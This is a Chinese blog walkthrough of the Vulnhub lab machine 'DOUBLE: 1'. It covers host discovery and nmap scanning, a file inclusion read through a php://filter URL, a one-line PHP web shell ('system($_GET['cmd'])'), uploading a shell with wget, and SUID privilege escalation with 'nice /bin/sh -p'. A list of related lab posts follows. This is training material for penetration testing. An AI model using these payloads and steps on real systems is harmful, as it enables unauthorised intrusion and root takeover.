Vulnhub靶机——DOUBLE: 1

已于 2022-04-26 08:16:30 修改
阅读量3.9k 收藏 1
点赞数 4
分类专栏: vulnhub 文章标签: 安全 运维
于 2022-03-18 15:55:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51295120/article/details/123061302
版权

靶机下载链接在这
VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1
1.主机发现:
netdiscover -r 172.16.10.0/24 -i eth0
在这里插入图片描述
2. 信息收集:
使用nmap进行全端口服务版本扫描:
nmap -n -T5 -p- -sV -sS 172.16.10.212
在这里插入图片描述
发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务
3. 渗透测试
在这里插入图片描述
这里有两个超链接:Production和TEST
点击Production链接:
在这里插入图片描述
TEST链接:
在这里插入图片描述
尝试弱密码后无效
回到Production页面,这里提示我们提交命令,dir看看:
在这里插入图片描述
这里url中有个可疑的参数:
在这里插入图片描述
尝试进行sql注入无果后,发现这里存在文件包含:
在这里插入图片描述
在这里插入图片描述
尝试读取id_rsa报错了
在这里插入图片描述
尝试使用伪协议读取sendcommand.php:
构造url:
?out=php://filter/convert.base64-encode/resource=/var/www/html/production/sendcommand.php
在这里插入图片描述
解码:
在这里插入图片描述
发现这里输入cmd的指令是通过php进行传递的;构造payload:

<?php system($_GET['cmd']);?>

在这里插入图片描述
send command后出现报错信息:
在这里插入图片描述
尝试运行cmd代码:
在这里插入图片描述
这里能执行命令,wget -help发现这里能用wget命令;直接写马,上传,连接:
在这里插入图片描述
(这里ip和上面不一样的原因是我这里回了下快照重新接着上面做的)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
连接:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
使用find查找可用的suid二进制文件
在这里插入图片描述
在这里插入图片描述
直接使用nice /bin/sh -p提权:
在这里插入图片描述
在这里插入图片描述
成功获取root权限

MzhYou
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub-DOLI: 1渗透
laoyanCZ的博客
11-27 1708
点我直接下载靶机
vulnhub靶场之double:1
weixin_42478365的博客
05-10 504
文件读取漏洞配合一句话木马,造成远程代码任意执行漏洞;SUID提权(/usr/bin/nice)
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3020
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7118
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub】搭建Vulnhub靶机
最新发布
qq_53058639的博客
01-23 1855
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5810
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2764
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 170
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1413
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
渗透测试part(二):Vulnhub配置(以EMPIRE: BREAKOUT为例)
m0_56592545的博客
06-25 308
在part(一)中,简要介绍了渗透测试的基本概念,并在第七部分提及了Vulnhub靶场。本文主要针对Vulnhub靶场的配置以及攻击机Kali的配置进行说明,希望能够帮助大家搭建一个简单的攻防环境,并踏出渗透测试的第一步。
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2320
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
vulnhubdoubletrouble: 1
weixin_54431413的博客
06-05 903
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值